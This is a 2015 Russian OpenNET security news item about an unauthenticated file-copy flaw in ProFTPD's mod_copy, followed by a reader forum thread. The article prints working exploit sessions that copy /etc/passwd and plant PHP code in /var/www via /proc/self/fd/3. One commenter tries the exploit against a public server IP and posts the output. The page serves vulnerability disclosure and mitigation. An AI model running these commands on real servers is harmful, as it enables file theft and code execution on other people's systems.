The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

10.04.2015 08:45  Опасная уязвимость в ProFTPD, проявляющаяся без аутентификации

В ftp-сервере ProFTPD обнаружена опасная уязвимость, которая позволяет копировать файлы в пределах сервера без проведения аутентификации с помощью команд "site cpfr" и "site cpto". Проблема проявляется в модуле mod_copy, который позволяет выполнять команды на стадии до проведения аутентификации пользователя. Уязвимость усугубляется отсутствием возможности отключить mod_copy через файл конфигурации и наличием путей эксплуатации уязвимости, которые могут быть использованы в атаке для организации выполнения кода на web-сервере.

В настоящий момент исправления доступны только в виде патча в git-репозитории проекта. Одновременно для ProFTPD предложена реализация директивы CopyEngine, через которую можно отключить mod_copy без перекомпиляции. В настоящее время в дистрибутивах не зафиксировано обновлений пакетов с устранением проблемы. Оценить появление обновлений в дистрибутивах можно на следующих страницах: RHEL 6, RHEL 7, Ubuntu, Debian, Fedora, openSUSE, SLES, Slackware, Gentoo, CentOS, FreeBSD.

Пример копирования файла /etc/passwd в /tmp/passwd.copy:


   Trying 192.168.3.115...
   Connected to 192.168.3.115.
   Escape character is '^]'.
   220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.3.115]
   site cpfr /etc/passwd
   350 File or directory exists, ready for destination name
   site cpto /tmp/passwd.copy
   250 Copy successful

Пример организации запуска кода на web-сервере:


   site cpfr /etc/passwd
   350 File or directory exists, ready for destination name
   site cpto <?php phpinfo(); ?>
   550 cpto: Permission denied
   site cpfr /proc/self/fd/3
   350 File or directory exists, ready for destination name
   site cpto /var/www/test.php
   250 Copy successful

Файл test.php будет содержать данные из потока STDERR, в том числе и указанный в ошибочной команде PHP-код:


   2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
   2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): FTP session opened.
   2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php
phpinfo(); ?>' for copying: Permission denied


  1. Главная ссылка к новости (http://bugs.proftpd.org/show_b...)
  2. OpenNews: Релиз ftp-сервера ProFTPD 1.3.5
  3. OpenNews: Опасная уязвимость в ProFTPD и ftpd из состава FreeBSD
  4. OpenNews: Релиз ftp-сервера ProFTPD 1.3.4 и 1.3.3g с устранением критической уязвимости
  5. OpenNews: Релиз ftp-сервера ProFTPD 1.3.3e с устранением уязвимостей
  6. OpenNews: Вышел ProFTPD 1.3.3c с исправлением уязвимости
Автор новости: Vlad
Тип: Проблемы безопасности
Ключевые слова: proftpd
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Линейный вид | Ajax | Показать все | RSS
 
  • 1.1, Аноним, 09:25, 10/04/2015 [ответить] [смотреть все]
  • –7 +/
    Граждане, уберите ip сервера из статьи! :)
     
     
  • 2.4, adminlocalhost, 09:34, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]
  • +6 +/
    какой ужс засветить локальный ип...
     
     
  • 3.9, Нанобот, 09:56, 10/04/2015 [^] [ответить] [смотреть все]
  • +4 +/
    там было 80 150 216 115, потом исправили ... весь текст скрыт [показать]
     
     
  • 4.11, Anonim, 10:06, 10/04/2015 [^] [ответить] [смотреть все]  
  • +29 +/
    >> какой ужс засветить локальный ип...
    >
    > там было 80.150.216.115, потом исправили

    Граждане, уберите ip сервера из комментария! :)

     
     
  • 5.12, adminlocalhost, 10:18, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    его уже столько раз засветили...
    и ниже даже проверяли на предмет пофикса
     
  • 2.8, Нанобот, 09:56, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +2 +/
    о ужас они опубликовали ip-адрес, зная его, хакиры смогут зверски расправиться ... весь текст скрыт [показать] [показать ветку]
     
  • 1.2, Аноним, 09:33, 10/04/2015 [ответить] [смотреть все]  
  • +/
    добавим, что данный мод появился в 1.3.4 - Slowpoke могут продолжать спать!
     
     
  • 2.40, Nas_tradamus, 18:40, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Сервак на убунте telnet ftp site ru 21 Trying 81 108 142 19 Connected to ftp... весь текст скрыт [показать] [показать ветку]
     
  • 1.3, бедный буратино, 09:34, 10/04/2015 [ответить] [смотреть все]  
  • +/
    ftp и php - созданы друг для друга
     
     
  • 2.84, Аноним, 13:13, 12/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    Кто о чем, а буратино гремит бидоном ... весь текст скрыт [показать] [показать ветку]
     
  • 1.5, luzerz, 09:41, 10/04/2015 [ответить] [смотреть все]  
  • +/
    у них уже не работает(
    Trying 80.150.216.115...
    Connected to 80.150.216.115.
    Escape character is '^]'.
    220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
    site cpfr /etc/passwd
    350 File or directory exists, ready for destination name
       site cpto /tmp/passwd.copy
    500 Invalid command: try being more creative
     
     
  • 2.6, luzerz, 09:41, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    хотя не скопипастил криво работает site cpto tmp passwd copy 250 Copy successfu... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.19, Аноним, 11:59, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    фтп демон от рута работает штоль Зачем вообще выполнять команды до аунтификации... весь текст скрыт [показать]
     
     
  • 4.85, Nas_tradamus, 13:44, 12/04/2015 [^] [ответить] [смотреть все]  
  • +/
    В /tmp любой юзер может писать.
     
  • 1.7, adminlocalhost, 09:48, 10/04/2015 [ответить] [смотреть все]  
  • +2 +/
    в centos из коробки без него proftpd -V | grep -i copy
    в сусе он shared - cd /usr/lib64/proftpd && mv mod_copy.so{,.0} && service proftpd restart

    так что живем пока, жаль только что proftpd подтверждает свою дырявость...

     
     
  • 2.51, vlikhachev, 20:46, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +2 +/
    В CentOS оно не так ftp site cpfr etc passwd 500 SITE CPFR not understood ft... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.77, Аноним, 07:51, 12/04/2015 [^] [ответить] [смотреть все]  
  • +/
    читать сообщение, перед тем как что-то писать в ответ, не пробовал?
     
  • 1.10, Аноним, 09:59, 10/04/2015 [ответить] [смотреть все]  
  • +/
    У меня Slackware-14 1 К сожалению или счастью - не получилось ничего ftp pa... весь текст скрыт [показать]
     
     
  • 2.13, Аноним, 10:28, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    С помощью telnet тоже не работает?
     
     
  • 3.14, Аноним, 10:43, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    Да, тоже не работает 230-Connected to server Logging in 230-220 ProFTPD 1 3... весь текст скрыт [показать]
     
     
  • 4.15, ALex_hha, 11:17, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    С какой задницы они выдрали этот модуль Ведь по дефолту этого модуля нет http ... весь текст скрыт [показать]
     
     
  • 5.20, бедный буратино, 12:02, 10/04/2015 [^] [ответить] [смотреть все]  
  • –2 +/
    увы, из песни ты не понял ничего а на php мне как-то фиолетово речь идёт о к... весь текст скрыт [показать]
     
     
  • 6.45, Аноним, 20:11, 10/04/2015 [^] [ответить] [смотреть все]  
  • +1 +/
    > речь идёт о конкретной культуре...

    Из тебя культура так и прет. Конкретно.

     
  • 1.16, Омномним, 11:33, 10/04/2015 [ответить] [смотреть все]  
  • +/
    Хорошо, что я на своей toy vps-ке поставил vsftpd.
    (Ожидаю советов от достопочтенных анонимусов, почему я это сделал зря.)
     
     
  • 2.25, Анонимус сапиенс, 13:35, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • –6 +/
    Зачем тебе FTP? Роль FTP прекрасно заменяют python или lighttpd + SFTP.
     
     
  • 3.32, cmp, 14:58, 10/04/2015 [^] [ответить] [смотреть все]  
  • +2 +/
    А SFTP не заменяет FTP?, на кой черт там питон
     
  • 3.46, Аноним, 20:12, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    А питон там нафуа Можно какой-нибудь webdav использовать, наконец, если загрузк... весь текст скрыт [показать]
     
     
  • 4.104, Анонимус сапиенс, 22:40, 21/04/2015 [^] [ответить] [смотреть все]  
  • +/
    Анонимный FTP... весь текст скрыт [показать]
     
  • 1.17, Аноним, 11:42, 10/04/2015 [ответить] [смотреть все]  
  • +/
    А нефиг запихивать левые contrib-модули.
    В нормальных дистрах его нет.
     
  • 1.18, Аноним, 11:53, 10/04/2015 [ответить] [смотреть все]  
  • +/
    только vsftpd!
     
     
  • 2.75, Куяврег, 01:14, 12/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    штатный фряшный неплох
     
  • 1.21, Аноним, 12:02, 10/04/2015 [ответить] [смотреть все]  
  • +2 +/
    Лучше уж pureftpd.
     
     
  • 2.22, Аноним, 12:21, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Это чем позвольте поинтересоваться, лучше?
     
     
  • 3.27, Аноним, 14:27, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    Более безопасный. Фич меньше.
     
  • 3.28, sage, 14:30, 10/04/2015 [^] [ответить] [смотреть все]  
  • +1 +/
    чем proftpd.
     
     
  • 4.30, Аноним, 14:33, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    Согласен Pure-ftpd vs Vsftpd сравнить не могу, ибо последний не использовал П... весь текст скрыт [показать]
     
  • 3.29, Аноним, 14:30, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    http www cvedetails com product 16873 Proftpd-Proftpd html vendor_id 9520 http... весь текст скрыт [показать]
     
  • 2.86, Nas_tradamus, 13:50, 12/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Он довольно топорный и меньше фич в нем реализовано Pure не умеет несколько раз... весь текст скрыт [показать] [показать ветку]
     
  • 1.23, Аноним, 12:28, 10/04/2015 [ответить] [смотреть все]  
  • +/
    Centos 5, 6, 7 не подвержены Debian 6 не подвержен Ubuntu 10 04 не подвержен ... весь текст скрыт [показать]
     
  • 1.24, BadUID, 13:10, 10/04/2015 [ответить] [смотреть все]  
  • +/
    вынес вперед тапками 2 модуля
    mod_copy и mod_site_misc.
    на FreeBSD в портах убираете в Makefile в модулях
    mod_copy
    в pkg-plist убираете mod_copy и mod_site_misc
    сначала deinstall потом заново поставить. проверил - проблем нету
     
     
  • 2.26, Sw00p aka Jerom, 14:06, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    а в режиме только mod_sftp проявляется бага ?
     
  • 2.78, Аноним, 08:06, 12/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    так оно и так не подвержено, нахрена эти телодвижения модуль собирается, но не ... весь текст скрыт [показать] [показать ветку]
     
  • 1.31, Аноним, 14:52, 10/04/2015 [ответить] [смотреть все]  
  • –1 +/
    Кто-то ещё юзает это дырявое пoделие Даже так, кто-то ещё юзает недoпротокол ft... весь текст скрыт [показать]
     
     
  • 2.34, cmp, 15:27, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Да, его поддерживают почти все l2 коммутаторы В некоторых встраиваемых прошивка... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.35, Аноним, 15:47, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    > Да, его поддерживают почти все l2 коммутаторы.

    с tftp не путай

     
     
  • 4.60, cmp, 07:25, 11/04/2015 [^] [ответить] [смотреть все]  
  • +/
    А я и не путаю ... весь текст скрыт [показать]
     
  • 3.47, Аноним, 20:14, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    А мой кЕтайский тетрис его не поддерживает Так там и файлы обычно не перекидыва... весь текст скрыт [показать]
     
  • 2.36, Аноним, 16:00, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +3 +/
    протокол может и не идеальный, но единственный который 10гбит с линк утилизирует... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.48, Demo, 20:23, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    Пробовал по FTP передавать файлы между серверами оба подключены 10 Гбит с в Да... весь текст скрыт [показать]
     
  • 1.37, pony, 16:08, 10/04/2015 [ответить] [смотреть все]  
  • +/
    у ftp очень плохи дела, когда надо передавать много мелких файлов
     
     
  • 2.38, _KUL, 16:38, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Решается разрешением многопоточности Дела у протокола плохи тем, что пароль в ч... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.42, Аноним, 19:14, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    http://en.wikipedia.org/wiki/FTPS
     
  • 3.49, vlikhachev, 20:35, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    Так сделайте же анонимный вход с доверенных IP адресов, и если они работают 24 7... весь текст скрыт [показать]
     
     
  • 4.70, _KUL, 09:08, 11/04/2015 [^] [ответить] [смотреть все]  
  • –1 +/
    Не выход - в одном броадкасте злодей может себе ип доверенный повесить и беда.
     
     
  • 5.89, Anonymous1, 14:26, 12/04/2015 [^] [ответить] [смотреть все]  
  • +/
    Ну в одном broadcast-е злодей может и свой интерфейс в promiscque mode включить,... весь текст скрыт [показать]
     
  • 1.39, iZEN, 17:14, 10/04/2015 [ответить] [смотреть все]  
  • +/
    Ну, сколько можно. Пользуйтесь, scp(1).
     
  • 1.41, Администратор Сетей, 19:03, 10/04/2015 [ответить] [смотреть все]  
  • –3 +/
    ФТП очень даже нормальный средство передатчи файлив, только вы неумеете им польз... весь текст скрыт [показать]
     
     
  • 2.44, Аноним, 20:09, 10/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    FTP отличный протокол Только файрвол задолбаешься настраивать и работать будет ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.50, vlikhachev, 20:41, 10/04/2015 [^] [ответить] [смотреть все]  
  • +/
    ЭЭЭ Пардон, мы ведь про iptables сейчас говорим, или у Вас BSD ... весь текст скрыт [показать]
     
     
  • 4.83, Аноним, 13:09, 12/04/2015 [^] [ответить] [смотреть все]  
  • +/
    Мы говорим про то что этот супер-протокол или требует весьма неординарных костыл... весь текст скрыт [показать]
     
  • 4.87, Nas_tradamus, 13:58, 12/04/2015 [^] [ответить] [смотреть все]  
  • +/
    В BSD как раз и не надо ничего предпринимать, если у вас FTP за натом pf и ipfw... весь текст скрыт [показать]
     
  • 2.76, Куяврег, 01:17, 12/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    твоя учительница русского поседела только что

     
  • 1.43, Капитан, 19:45, 10/04/2015 [ответить] [смотреть все]  
  • +/
    Всегда использую PureFTPd отличный сервер для FTP безопасный/функциональный.
     
  • 1.59, Аноним, 01:53, 11/04/2015 [ответить] [смотреть все]  
  • +2 +/
    У ProFTPD такой здоровенная история уязвимостьей, что им пользуются только камик... весь текст скрыт [показать]
     
     
  • 2.82, ALex_hha, 12:44, 12/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    когда нужен широкий функционал, то выбора особо то и нет Так что приходится пла... весь текст скрыт [показать] [показать ветку]
     
  • 2.91, а, 12:05, 13/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Точно, ещё несколько лет назад увидев в новостях несколько раз подряд сообщения ... весь текст скрыт [показать] [показать ветку]
     
  • 1.61, Alex, 07:47, 11/04/2015 [ответить] [смотреть все]  
  • +/
    Какая прелесть...

    Блин, счастье, что никогда не рассматривал эту студенческую поделку ака ProFTPD всерьёз. Только vsftpd, только хардкор.

     
     
  • 2.81, ALex_hha, 12:43, 12/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    потому что у vsftpd функционала - кот наплакал, поэтому и уязвимостей находя нам... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.97, AlexAT, 21:22, 14/04/2015 [^] [ответить] [смотреть все]  
  • +/
    Простите, но древнющему говну мамонта а-ля FTP весь этот функционал совершенно... весь текст скрыт [показать]
     
     
  • 4.98, Nas_tradamus, 23:08, 14/04/2015 [^] [ответить] [смотреть все]  
  • –1 +/
    Раз вам не надо - значит и другим не надо Ясно а про scp пацаны-то и не знали ... весь текст скрыт [показать]
     
     
  • 5.99, AlexAT, 23:24, 14/04/2015 [^] [ответить] [смотреть все]  
  • +/
    Ну надо - хорошо Поломали в очередной раз - тоже хорошо Dixi ... весь текст скрыт [показать]
     
  • 4.100, ALex_hha, 10:45, 15/04/2015 [^] [ответить] [смотреть все]  
  • +/
    если вам нужен только ftp, то безусловно, proftpd вам точно не нужен, а хватит v... весь текст скрыт [показать]
     
     
  • 5.101, AlexAT, 19:34, 15/04/2015 [^] [ответить] [смотреть все]  
  • +/
    то лучше FTP вообще не использовать ни под каким соусом ... весь текст скрыт [показать]
     
     
  • 6.102, Nas_tradamus, 19:39, 15/04/2015 [^] [ответить] [смотреть все]  
  • +/
    А как обмениваться многогигабайтными файлами между кучей поставщиков партнёров к... весь текст скрыт [показать]
     
     
  • 7.103, AlexAT, 19:45, 15/04/2015 [^] [ответить] [смотреть все]  
  • +/
    А теперь найдите в своей фразе взаимоисключающие вещи.

     
  • 2.88, Nas_tradamus, 14:01, 12/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • –2 +/
    Сравните объем кода и функционала у этих двух программ Вы только что сделали ср... весь текст скрыт [показать] [показать ветку]
     
  • 1.71, Аноним, 14:34, 11/04/2015 [ответить] [смотреть все]  
  • +1 +/
    На Ubuntu комментируем в etc proftpd modules conf строку LoadModule mod_copy c,... весь текст скрыт [показать]
     
  • 1.79, Аноним, 09:49, 12/04/2015 [ответить] [смотреть все]  
  • +/
    Подскажите, почему при тестирование некоторых серверов с одинаковыми версиями Pr... весь текст скрыт [показать]
     
     
  • 2.80, ALex_hha, 12:41, 12/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    > Это зависит от ОС?

    скорее уж от опций сборки

     
  • 1.90, Аноним, 14:52, 12/04/2015 [ответить] [смотреть все]  
  • +/
    Debian Squeeze ProFTPD версии 1 3 3a, mod_copy там ещё нет Debian Wheezy ProF... весь текст скрыт [показать]
     
  • 1.92, Аноним, 19:41, 13/04/2015 [ответить] [смотреть все]  
  • +/
    Проверил на Debiane, да в папку tmp копирует, НО при копирование в var www вы... весь текст скрыт [показать]
     
     
  • 2.93, Nas_tradamus, 19:43, 13/04/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    В tmp может писать любой юзер, потому что А копирование идёт от юзера, от кото... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.94, Аноним, 20:06, 13/04/2015 [^] [ответить] [смотреть все]  
  • +/
    Тогда какие ещё есть мысли на этот счет Что можно сделать Используя данную уяз... весь текст скрыт [показать]
     
     
  • 4.95, Аноним, 12:37, 14/04/2015 [^] [ответить] [смотреть все]  
  • –1 +/
    ну, например, спереть что душе угодно, от сертефикатов, до баз с кредитками и фа... весь текст скрыт [показать]
     
     
  • 5.96, Аноним, 13:27, 14/04/2015 [^] [ответить] [смотреть все]  
  • +/
    gt оверквотинг удален Интересно было бы увидить пример, допустим мы можем копи... весь текст скрыт [показать]
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2017 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    Hosting by Ihor